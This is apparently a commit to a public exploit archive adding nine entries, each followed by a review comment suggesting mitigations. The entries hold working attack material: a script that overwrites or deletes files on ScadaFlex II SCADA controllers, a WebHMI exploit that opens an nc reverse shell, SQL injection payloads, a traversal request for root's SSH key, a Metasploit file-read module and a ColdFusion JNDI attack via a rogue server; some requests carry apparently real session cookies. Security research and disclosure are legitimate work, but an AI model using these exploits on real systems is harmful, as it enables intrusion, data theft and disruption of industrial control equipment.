diff --git a/exploits/hardware/remote/50783.py b/exploits/hardware/remote/50783.py
new file mode 100755
index 000000000..2314c3b6c
--- /dev/null
+++ b/exploits/hardware/remote/50783.py
@@ -0,0 +1,175 @@
+# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+# Exploit Author: LiquidWorm
+
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+#
+#
+# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD
+#
+#
+# Vendor: Industrial Control Links, Inc.
+# Product web page: http://www.iclinks.com
+# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf
+# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24
+# SW: 1.02.20 (build 286), WebLib: 1.24
+# SW: 1.02.15 (build 286), WebLib: 1.22
+# SW: 1.02.01 (build 229), WebLib: 1.16
+# SW: 1.01.14 (build 172), WebLib: 1.14
+# SW: 1.01.01 (build 2149), WebLib: 1.13
+#
+#
+# Summary: Scadaflex II controllers are 100% web based
+# for both configuration and user interface. No applications
+# are required other than any standard web browser. They
+# are easily supported by remote access over the Internet
+# or a cellular link. Scadaflex II controllers support
+# industry standard wired communications using Modbus,
+# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial
+# bridging for Modbus or any other protocol. Each Scadaflex
+# II controller has both analog and digital, inputs and
+# outputs, sufficient for pumping stations, irrigation
+# controls, and other similar process monitoring and control
+# applications. They can also serve as communications
+# concentrators and protocol converters that enhance the
+# operation of existing PLCs and process equipment.
+#
+# Desc: The SCADA controller is vulnerable to unauthenticated
+# file write/overwrite and delete vulnerability. This allows
+# an attacker to execute critical file CRUD operations on the
+# device that can potentially allow system access and impact
+# availability.
+#
+# Tested on: SCADA HTTP Server
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2022-5698
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php
+#
+# CVE ID: CVE-2022-25359
+# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359
+#
+#
+# 06.11.2021
+#
+
+import time,sys
+import requests
+import datetime
+import showtime
+
+# Default
+# AES Encryption Key = 'ABCD1234abcd:ICL'
+
+def bann():
+ print('''
+----------------------------------------------------------
+ ) ) ) ) ) )
+ ( ( ( ( ( (
+ ) ) ) ) ) )
+ (~~~~~~~~~) (~~~~~~~~~)
+ | t00t | | w00t |
+ | | | |
+ I _._ I _._
+ I /' `\\ I /' `\\
+ I | M | I | J |
+ f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|
+ .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |
+/'______|___||__###___|____|/'_______|____|_|__###___|___|
+
+ ScadaFlex II SCADA Controllers
+ Remote write/delete PoC
+ ZSL-2022-5698
+----------------------------------------------------------
+ ''')
+
+def safe(*trigger, ):
+ return True # |-| Safety Switch
+
+def choice(n):
+ try:
+ if n == 1:
+ overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))
+ elif n == 2:
+ delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))
+ else:
+ print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')
+ print('Usage (Delete): ./sflex.py [IP] [File position number]')
+ raise SystemExit('t00t')
+ except Exception as tip:
+ raise SystemExit(tip)
+
+def jump():
+ choice(1) if len(sys.argv) == 4 else next
+ choice(2) if len(sys.argv) == 3 else next
+
+def overwrite(controllerip, filepos):
+ print('Starting script at', start)
+ localfile = sys.argv[2]
+
+ with open(localfile, 'rb') as opener:
+ scadaurl = 'http://'
+ scadaurl += controllerip
+ scadaurl += '/d.php?N'
+ scadaurl += str(filepos)
+ scadaurl += ',73,'
+ scadaurl += opener.name
+ scadaurl += '~'
+ scadaurl += str(int(time.time()))
+
+ see = requests.post(scadaurl, files = {'upload' : opener})
+
+ if '100' in see.text:
+ print('File uploaded in {} directory at position {}.'.format('l', filepos))
+ print('URL: http://' +controllerip+ '/l/' +localfile)
+ else:
+ print("- controller webserver error.")
+ exit()
+
+def delete(controllerip, filepos):
+ print('Starting script at', start)
+ exit(42) if isinstance(filepos, str) else next
+
+ scadaurl = 'http://'
+ scadaurl += controllerip
+ scadaurl += '/rW12IcL_Dat_N'
+ scadaurl += str(filepos)
+ scadaurl += ',0=1~'
+ scadaurl += str(int(time.time()))
+
+ see = requests.get(scadaurl)
+
+ check = '\x72\x57' #|
+ check += '\x31\x32' #|
+ check += '\x49\x63' #|
+ check += '\x4c\x5f' #|
+ check += '\x44\x61' #|
+ check += '\x74\x5f' #|
+ check += '\x4e'# o' #|
+ check += str(filepos)#|
+ check += '\x2c\x30' #|
+ check += '\x09\x52' #|
+
+ if check in see.text:
+ print('File at position {} deleted.'.format(filepos))
+ else:
+ print('- controller webserver error.')
+ exit()
+
+def main():
+ if safe(True):
+ print('Careful...\nSafety: ON')
+ exit(17)
+ else:
+ print('Safety: OFF', end = '')
+ global start
+ start = datetime.datetime.now()
+ start = start.strftime('%d.%m.%Y %H:%M:%S')
+ bann(), jump(), choice(1959)
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
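Review bot: The header block documents the flaw and CVE-2022-25359 but gives a defender nothing to act on, even though both request shapes are plain in `overwrite()` and `delete()`: a POST to `/d.php?N<pos>,73,<name>~<epoch>` and a GET to `/rW12IcL_Dat_N<pos>,0=1~<epoch>`, neither carrying any credential. I would add a short `# Detection / mitigation:` comment after the `Desc:` paragraph, saying that either path arriving from outside the management network is the indicator to alert on and that the controller's web server should not be reachable from untrusted networks. The `# AES Encryption Key` comment under the imports is also unexplained; if it is the factory default, it should say so and say that it needs changing on deployed units. As a style point, the shebang and coding lines sit below the title comments, where the interpreter does not honour them.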
diff --git a/exploits/linux/webapps/50780.txt b/exploits/linux/webapps/50780.txt
new file mode 100644
index 000000000..6ff263267
--- /dev/null
+++ b/exploits/linux/webapps/50780.txt
@@ -0,0 +1,40 @@
+# Exploit Title: aaPanel 6.8.21 - Directory Traversal (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Fikrat Ghuliev (Ghuliev)
+# Vendor Homepage: https://www.aapanel.com/
+# Software Link: https://www.aapanel.com
+# Version: 6.8.21
+# Tested on: Ubuntu
+
+Application vulnerable to Directory Traversal and attacker can get root user private ssh key(id_rsa)
+
+#Go to App Store
+
+#Click to "install" in any free plugin.
+
+#Change installation script to ../../../root/.ssh/id_rsa
+
+POST /ajax?action=get_lines HTTP/1.1
+Host: IP:7800
+Content-Length: 41
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82
+Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://IP:7800
+Referer: http://IP:7800/soft
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: aa0775f98350c5c13bfd21f2c6b8c288=d20c4937-e5ae-46fb-b8bd-fa7c290d805a.ohyRHdOIMj3DBfyddCRbL-rlKB0;
+request_token=nKLXa4RUXgwBHeWNyMH1MEDSkTaks9dWjQ7zzA0iRc7lrHwd;
+serverType=nginx; order=id%20desc; memSize=3889; vcodesum=13;
+page_number=20; backup_path=/www/backup; sites_path=/www/wwwroot;
+distribution=ubuntu; serial_no=; pro_end=-1; load_page=null;
+load_type=null; load_search=undefined; force=0; rank=list;
+Path=/www/wwwroot; bt_user_info=; default_dir_path=/www/wwwroot/;
+path_dir_change=/www/wwwroot/
+Connection: close
+
+num=10&filename=../../../root/.ssh/id_rsa
\ No newline at end of file
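Review bot: The `Cookie:` header in the sample request carries what look like a real panel session cookie and `request_token` value; in a published write-up these should be placeholders such as `Cookie: <session-cookie>; request_token=<token>`, the way the host is already written as `IP:7800`. The write-up also stops at the request and never states the fix. The `filename` parameter of `/ajax?action=get_lines` is evidently used as a path without being confined to a base directory, so the handler should resolve the path and reject anything outside the intended directory. A closing line to that effect, plus a note that any `filename` containing `../` on this endpoint is worth alerting on, would make the entry usable for defenders.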
diff --git a/exploits/php/webapps/50778.txt b/exploits/php/webapps/50778.txt
new file mode 100644
index 000000000..0c01505a3
--- /dev/null
+++ b/exploits/php/webapps/50778.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Simple Real Estate Portal System 1.0 - 'id' SQL Injection
+# Date: 22/02/2022
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15184/simple-real-estate-portal-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Linux mosaaed 5.5.0-1parrot1-amd64 #1 SMP Parrot 5.5.17-1parrot1 (2020-04-25) x86_64 GNU/Linux
+
+
+
+# Sqlmap command:
+
+sqlmap -u "http://localhost/reps/?p=view_estate&id=6" --batch --dbs
+
+# Output:
+
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: p=view_estate&id=6' AND 9373=9373 AND 'CcAj'='CcAj
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: p=view_estate&id=6' AND (SELECT 4967 FROM (SELECT(SLEEP(5)))Lowr) AND 'iyVC'='iyVC
+
+ Type: UNION query
+ Title: Generic UNION query (NULL) - 9 columns
+ Payload: p=view_estate&id=-3391' UNION ALL SELECT NULL,CONCAT(0x716b7a7a71,0x6a56556147504d795a536b566c7a4f5659677a65514c706758485a66484f464e5676496470695a41,0x7162767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
\ No newline at end of file
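Review bot: None of the three SQL-injection entries in this commit (this file, 50779.txt and 50782.txt) says what is wrong in the application or how to fix it; each only shows a quoted GET parameter (`id`, `ref_code`, `cid`) being closed with `'` and extended. That pattern suggests the value is concatenated into the query string, though the server-side code is not shown here. I would add one line per file such as `# Fix: bind the parameter in a prepared statement; validate it as an integer where it is an id`. This file also has no description between the header and the sqlmap command, and a sentence naming the affected page (`?p=view_estate`) and parameter would bring it in line with the other entries.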
diff --git a/exploits/php/webapps/50779.txt b/exploits/php/webapps/50779.txt
new file mode 100644
index 000000000..ed52d7e35
--- /dev/null
+++ b/exploits/php/webapps/50779.txt
@@ -0,0 +1,33 @@
+# Title: Air Cargo Management System v1.0 - SQLi
+# Author: nu11secur1ty
+# Date: 02.18.2022
+# Vendor: https://www.sourcecodester.com/users/tips23
+# Software: https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html
+# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Air-Cargo-Management-System
+
+# Description:
+The `ref_code` parameter from Air Cargo Management System v1.0 appears
+to be vulnerable to SQL injection attacks.
+The payload '+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+'
+was submitted in the ref_code parameter.
+This payload injects a SQL sub-query that calls MySQL's load_file
+function with a UNC file path that references a URL on an external
+domain.
+The application interacted with that domain, indicating that the
+injected SQL query was executed.
+WARNING: If this is in some external domain, or some subdomain
+redirection, or internal whatever, this will be extremely dangerous!
+Status: CRITICAL
+
+
+[+] Payloads:
+
+---
+Parameter: ref_code (GET)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: p=trace&ref_code=258044'+(select
+load_file('\\\\c5idmpdvfkqycmiqwv299ljz1q7jvej5mtdg44t.https://www.sourcecodester.com/php/15188/air-cargo-management-system-php-oop-free-source-code.html\\hag'))+''
+AND (SELECT 9012 FROM (SELECT(SLEEP(3)))xEdD) AND 'JVki'='JVki
+---
\ No newline at end of file
diff --git a/exploits/php/webapps/50782.txt b/exploits/php/webapps/50782.txt
new file mode 100644
index 000000000..2617defa3
--- /dev/null
+++ b/exploits/php/webapps/50782.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Student Record System 1.0 - 'cid' SQLi (Authenticated)
+# Exploit Author: Mohd. Anees
+# Contact: https://www.linkedin.com/in/aneessecure/
+# Software Homepage: https://phpgurukul.com/student-record-system-php/
+# Version : 1.0
+# Tested on: windows 10 xammp | Kali linux
+# Category: WebApp
+# Google Dork: N/A
+# Date: 22.02.2022
+######## Description ########
+#
+#
+# Authenticate and edit course section where cid parameter will appear and put your payload at there it'll work
+#
+# http://localhost/schoolmanagement/schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+
+#
+######## Proof of Concept ########
+
+========>>> REQUEST <<<=========
+
+GET /schoolmanagement/pages/edit-course.php?cid=-7%27%20union%20select%201,2,3,4,5--+ HTTP/1.1
+Host: localhost
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=m1s7h9jremg0vj7ipkgf9m05n1nt
+Connection: close
\ No newline at end of file
diff --git a/exploits/php/webapps/50784.py b/exploits/php/webapps/50784.py
new file mode 100755
index 000000000..758f47d57
--- /dev/null
+++ b/exploits/php/webapps/50784.py
@@ -0,0 +1,106 @@
+# Exploit Title: WebHMI 4.1.1 - Remote Code Execution (RCE) (Authenticated)
+# Date: 03/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI 4.1.1.7662
+# Tested on: WebHMI-4.1.1.7662
+
+#!/usr/bin/python
+import sys
+import re
+import argparse
+import requests
+import time
+import subprocess
+
+print("\nWebHMI 4.1.1 - Remote Code Execution (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
+print("Level2 account must be enabled !\n");
+
+login = "admin"
+password = "admin"
+
+class Exploit:
+
+ def __init__(self, target_ip, target_port, localhost, localport):
+ self.target_ip = target_ip
+ self.target_port = target_port
+ self.localhost = localhost
+ self.localport = localport
+
+ def exploitation(self):
+ reverse = """rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+""" + localhost + """+""" + localport + """+>/tmp/f"""
+ payload = ""
+
+ headers_login = {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36',
+ 'Accept': 'application/json, text/javascript, */*; q=0.01',
+ 'Accept-Language': 'en-US,en;q=0.5',
+ 'Accept-Encoding': 'gzip, deflate',
+ 'Content-Type': 'application/json',
+ 'X-WH-LOGIN': login,
+ 'X-WH-PASSWORD': password,
+ 'X-Requested-With': 'XMLHttpRequest',
+ 'Connection': 'close',
+ 'Content-Length': '0'
+ }
+
+ url = 'http://' + target_ip + ':' + target_port
+ r = requests.Session()
+
+ print('[*] Resolving URL...')
+ r1 = r.get(url)
+ time.sleep(3)
+
+ print('[*] Trying to log in...')
+ r2 = r.post(url + '/api/signin', headers=headers_login, allow_redirects=True)
+ time.sleep(3)
+
+ print('[*] Login redirection...')
+ login_cookies = {
+ 'X-WH-SESSION-ID':r2.headers['X-WH-SESSION-ID'],
+ 'X-WH-CHECK-TRIAL':'true',
+ 'il18next':'en',
+ }
+ r3 = r.post(url + '/login.php?sid=' + r2.headers['X-WH-SESSION-ID'] + '&uid=1',cookies=login_cookies)
+ time.sleep(3)
+
+ print('[*] Bypassing basedir...')
+ for i in range(0, len(payload)):
+ #print(payload[i])
+ rp = r.get(url + '/setup/backup.php?sync=`echo%20-n%20"' + payload[i] + '">>cmd.php`', cookies=login_cookies)
+ time.sleep(0.2)
+
+ print('[*] Setting up listener...')
+ listener = subprocess.Popen(["nc", "-nlp", self.localport])
+ time.sleep(2)
+
+ print('[*] Executing payload...')
+ time.sleep(1)
+ print('[*] Waiting reverse shell...')
+ r4 = r.get(url + '/setup/cmd.php?c=`' + reverse + '`.bak', cookies=login_cookies)
+
+ if (r4.status_code == 200):
+ print('[*] Got shell!')
+ while True:
+ listener.wait()
+ else:
+ print('[-] Something went wrong!')
+ listener.terminate()
+
+def get_args():
+ parser = argparse.ArgumentParser(description='WebHMI 4.1.1 - Remote Code Execution (Authenticated)')
+ parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
+ parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
+ parser.add_argument('-L', '--listener-ip', dest="localhost", required=True, action='store', help='Local listening IP')
+ parser.add_argument('-P', '--localport', dest="localport", required=True, action='store', help='Local listening port')
+ args = parser.parse_args()
+ return args
+
+args = get_args()
+target_ip = args.url
+target_port = args.target_port
+localhost = args.localhost
+localport = args.localport
+
+exp = Exploit(target_ip, target_port, localhost, localport)
+exp.exploitation()
\ No newline at end of file
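Review bot: `login = "admin"` and `password = "admin"` are hard-coded at module level and sent as `X-WH-LOGIN`/`X-WH-PASSWORD` headers over plain `http://`, yet the header comment never says whether these are the product's shipped Level2 credentials. If they are, changing them is the first mitigation, and the comment block should state the precondition, e.g. `# Precondition: Level2 account enabled with unchanged admin/admin credentials`. For detection, the file should also note that its requests stand out in an access log: backtick characters in the `sync` parameter of `/setup/backup.php`, followed by requests to a `cmd.php` under `/setup/` that the product presumably does not ship. As a style point, `exploitation()` reads the module globals `localhost`, `localport`, `target_ip` and `target_port` rather than the `self.` attributes set in `__init__`, so the class is only usable when run as this script.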
diff --git a/exploits/php/webapps/50785.txt b/exploits/php/webapps/50785.txt
new file mode 100644
index 000000000..ca2e8b85a
--- /dev/null
+++ b/exploits/php/webapps/50785.txt
@@ -0,0 +1,30 @@
+# Exploit Title: WebHMI 4.1 - Stored Cross Site Scripting (XSS) (Authenticated)
+# Date: 04/01/2022
+# Exploit Author: Antonio Cuomo (arkantolo)
+# Vendor Homepage: https://webhmi.com.ua/en/
+# Version: WebHMI Firmware 4.1.1.7662
+# Tested on: WebHMI Firmware 4.1.1.7662
+
+#Steps to Reproduce
+
+1. Login to admin account
+
+2. Add a new register or create new dashboard
+insert payload
+
+
+
+in Title field and save.
+
+# Dashboard section impact instantly all logged users.
+
+#Listener log:
+GET /?PHPSESSID=acaa76374df7418e81460b4a625cb457;%20i18next=en;%20X-WH-SESSION-ID=8a5d6c60bdab0704f32e792bc1d36a6f HTTP/1.1
+Host: 192.168.0.169:8080
+Connection: keep-alive
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
+Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
+Sec-GPC: 1
+Referer: http://192.168.0.153/
+Accept-Encoding: gzip, deflate
+Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
\ No newline at end of file
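Review bot: The listener log publishes full `PHPSESSID` and `X-WH-SESSION-ID` values; they should be replaced with placeholders such as `PHPSESSID=<redacted>`. That both cookies appear in a script-issued request suggests they are not flagged `HttpOnly`, which is worth stating as a second finding alongside the missing output encoding of the Title field. The entry names no fixed firmware and no mitigation; a line such as `# Mitigation: HTML-encode register and dashboard titles on output; set HttpOnly on session cookies` would close it.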
diff --git a/exploits/php/webapps/50786.rb b/exploits/php/webapps/50786.rb
new file mode 100755
index 000000000..d39a15068
--- /dev/null
+++ b/exploits/php/webapps/50786.rb
@@ -0,0 +1,245 @@
+# Exploit Title: Microweber CMS v1.2.10 Local File Inclusion (Authenticated)
+# Date: 22.02.2022
+# Exploit Author: Talha Karakumru
+# Vendor Homepage: https://microweber.org/
+# Software Link: https://github.com/microweber/microweber/archive/refs/tags/v1.2.10.zip
+# Version: Microweber CMS v1.2.10
+# Tested on: Microweber CMS v1.2.10
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ prepend Msf::Exploit::Remote::AutoCheck
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'Microweber CMS v1.2.10 Local File Inclusion (Authenticated)',
+ 'Description' => %q{
+ Microweber CMS v1.2.10 has a backup functionality. Upload and download endpoints can be combined to read any file from the filesystem.
+ Upload function may delete the local file if the web service user has access.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [
+ 'Talha Karakumru '
+ ],
+ 'References' => [
+ ['URL', 'https://huntr.dev/bounties/09218d3f-1f6a-48ae-981c-85e86ad5ed8b/']
+ ],
+ 'Notes' => {
+ 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+ 'Reliability' => [ REPEATABLE_SESSION ],
+ 'Stability' => [ OS_RESOURCE_LOSS ]
+ },
+ 'Targets' => [
+ [ 'Microweber v1.2.10', {} ]
+ ],
+ 'Privileged' => true,
+ 'DisclosureDate' => '2022-01-30'
+ )
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path for Microweber', '/']),
+ OptString.new('USERNAME', [true, 'The admin\'s username for Microweber']),
+ OptString.new('PASSWORD', [true, 'The admin\'s password for Microweber']),
+ OptString.new('LOCAL_FILE_PATH', [true, 'The path of the local file.']),
+ OptBool.new('DEFANGED_MODE', [true, 'Run in defanged mode', true])
+ ]
+ )
+ end
+
+ def check
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'admin', 'login')
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Microweber CMS cannot be reached.')
+ end
+
+ print_status 'Checking if it\'s Microweber CMS.'
+
+ if res.code == 200 && !res.body.include?('Microweber')
+ print_error 'Microweber CMS has not been detected.'
+ Exploit::CheckCode::Safe
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ print_good 'Microweber CMS has been detected.'
+
+ return check_version(res.body)
+ end
+
+ def check_version(res_body)
+ print_status 'Checking Microweber\'s version.'
+
+ begin
+ major, minor, build = res_body[/Version:\s+(\d+\.\d+\.\d+)/].gsub(/Version:\s+/, '').split('.')
+ version = Rex::Version.new("#{major}.#{minor}.#{build}")
+ rescue NoMethodError, TypeError
+ return Exploit::CheckCode::Safe
+ end
+
+ if version == Rex::Version.new('1.2.10')
+ print_good 'Microweber version ' + version.to_s
+ return Exploit::CheckCode::Appears
+ end
+
+ print_error 'Microweber version ' + version.to_s
+
+ if version < Rex::Version.new('1.2.10')
+ print_warning 'The versions that are older than 1.2.10 have not been tested. You can follow the exploitation steps of the official vulnerability report.'
+ return Exploit::CheckCode::Unknown
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def try_login
+ print_status 'Trying to log in.'
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'keep_cookies' => true,
+ 'uri' => normalize_uri(target_uri.path, 'api', 'user_login'),
+ 'vars_post' => {
+ 'username' => datastore['USERNAME'],
+ 'password' => datastore['PASSWORD'],
+ 'lang' => '',
+ 'where_to' => 'admin_content'
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Log in request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ json_res = res.get_json_document
+
+ if !json_res['error'].nil? && json_res['error'] == 'Wrong username or password.'
+ fail_with(Failure::BadConfig, 'Wrong username or password.')
+ end
+
+ if !json_res['success'].nil? && json_res['success'] == 'You are logged in'
+ print_good 'You are logged in.'
+ return
+ end
+
+ fail_with(Failure::Unknown, 'An unknown error occurred.')
+ end
+
+ def try_upload
+ print_status 'Uploading ' + datastore['LOCAL_FILE_PATH'] + ' to the backup folder.'
+
+ referer = ''
+ if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+ referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+ else
+ referer = full_uri
+ end
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'upload'),
+ 'vars_get' => {
+ 'src' => datastore['LOCAL_FILE_PATH']
+ },
+ 'headers' => {
+ 'Referer' => referer
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Upload request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ if res.headers['Content-Type'] == 'application/json'
+ json_res = res.get_json_document
+
+ if json_res['success']
+ print_good json_res['success']
+ return
+ end
+
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ fail_with(Failure::BadConfig, 'Either the file cannot be read or the file does not exist.')
+ end
+
+ def try_download
+ filename = datastore['LOCAL_FILE_PATH'].include?('\\') ? datastore['LOCAL_FILE_PATH'].split('\\')[-1] : datastore['LOCAL_FILE_PATH'].split('/')[-1]
+ print_status 'Downloading ' + filename + ' from the backup folder.'
+
+ referer = ''
+ if !datastore['VHOST'].nil? && !datastore['VHOST'].empty?
+ referer = "http#{datastore['SSL'] ? 's' : ''}://#{datastore['VHOST']}/"
+ else
+ referer = full_uri
+ end
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, 'api', 'BackupV2', 'download'),
+ 'vars_get' => {
+ 'filename' => filename
+ },
+ 'headers' => {
+ 'Referer' => referer
+ }
+ })
+
+ if res.nil?
+ fail_with(Failure::Unreachable, 'Download request failed.')
+ end
+
+ if res.code != 200
+ fail_with(Failure::Unknown, res.body)
+ end
+
+ if res.headers['Content-Type'] == 'application/json'
+ json_res = res.get_json_document
+
+ if json_res['error']
+ fail_with(Failure::Unknown, json_res['error'])
+ return
+ end
+ end
+
+ print_status res.body
+ end
+
+ def run
+ if datastore['DEFANGED_MODE']
+ warning = <<~EOF
+ Triggering this vulnerability may delete the local file if the web service user has the permission.
+ If you want to continue, disable the DEFANGED_MODE.
+ => set DEFANGED_MODE false
+ EOF
+
+ fail_with(Failure::BadConfig, warning)
+ end
+
+ try_login
+ try_upload
+ try_download
+ end
+end
\ No newline at end of file
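Review bot: In `check`, the bare `Exploit::CheckCode::Safe` after `print_error 'Microweber CMS has not been detected.'` is never returned, so execution falls through to `print_good 'Microweber CMS has been detected.'` and `check_version`. A host that is not Microweber therefore gets both messages, and the result comes only from `check_version`. The line should be `return Exploit::CheckCode::Safe`. By Metasploit convention the two `fail_with` calls in `check` would also be better as `return Exploit::CheckCode::Unknown`, so a check across several hosts reports a result instead of aborting; the `return` after `fail_with` in `try_download` is unreachable. The `Referer` computation is duplicated verbatim in `try_upload` and `try_download` and could live in one private helper.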
diff --git a/exploits/windows/remote/50781.txt b/exploits/windows/remote/50781.txt
new file mode 100644
index 000000000..037bf9ba7
--- /dev/null
+++ b/exploits/windows/remote/50781.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Adobe ColdFusion 11 - LDAP Java Object Deserialization Remode Code Execution (RCE)
+# Google Dork: intext:"adobe coldfusion 11"
+# Date: 2022-22-02
+# Exploit Author: Amel BOUZIANE-LEBLOND (https://twitter.com/amellb)
+# Vendor Homepage: https://www.adobe.com/sea/products/coldfusion-family.html
+# Version: Adobe Coldfusion (11.0.03.292866)
+# Tested on: Microsoft Windows Server & Linux
+
+# Description:
+# ColdFusion allows an unauthenticated user to connect to any LDAP server. An attacker can exploit it to achieve remote code execution.
+# JNDI attack via the 'verifyldapserver' parameter on the utils.cfc
+
+==================== 1.Setup rogue-jndi Server ====================
+
+https://github.com/veracode-research/rogue-jndi
+
+
+==================== 2.Preparing the Attack =======================
+
+java -jar target/RogueJndi-1.1.jar --command "touch /tmp/owned" --hostname "attacker_box"
+
+==================== 3.Launch the Attack ==========================
+
+
+http://REDACTED/CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json
+
+
+curl -i -s -k -X $'GET' \
+ -H $'Host: target' \
+ --data-binary $'\x0d\x0a\x0d\x0a' \
+ $'http://REDACTED//CFIDE/wizards/common/utils.cfc?method=verifyldapserver&vserver=LDAP_SERVER&vport=LDAP_PORT&vstart=&vusername=&vpassword=&returnformat=json'
+
+
+==================== 4.RCE =======================================
+
+Depend on the target need to compile the rogue-jndi server with JAVA 7 or 8
+Can be done by modify the pom.xml as below
+
+
+7
+7
+
\ No newline at end of file
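Review bot: The description says an unauthenticated user can make ColdFusion connect to any LDAP server, but it names no CVE, no fixed update and no mitigation. Since the request goes to `/CFIDE/wizards/common/utils.cfc`, I would add a line such as `# Mitigation: block external access to /CFIDE and restrict outbound LDAP from the application server`. A detection hint belongs there too: any request carrying `method=verifyldapserver` from an untrusted source is the indicator. The title misspells "Remote" as "Remode" (the same string is copied into the files_exploits.csv row), and `# Date: 2022-22-02` is not a valid year-month-day date.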
diff --git a/files_exploits.csv b/files_exploits.csv
index fea972e85..9336d3ff4 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -18623,6 +18623,8 @@ id,file,description,date,author,type,platform,port
